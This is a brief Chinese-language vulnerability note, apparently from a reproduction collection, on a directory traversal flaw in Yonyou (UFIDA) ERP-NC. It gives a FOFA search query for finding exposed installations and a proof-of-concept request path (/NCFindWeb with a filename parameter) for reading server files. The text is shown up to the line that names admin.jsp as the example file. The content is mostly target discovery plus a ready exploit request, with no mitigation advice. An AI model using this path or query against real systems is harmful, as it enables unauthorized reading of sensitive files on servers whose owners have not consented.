漏洞描述

⽤友ERP-NC 存在⽬录遍历漏洞,攻击者可以通过⽬录遍历获取敏感⽂件信息

fofa语法

app="⽤友-UFIDA-NC"

复现

POC:

/NCFindWeb?service=IPreAlertConfigService&filename=

查看文件(这里以admin.jsp为例):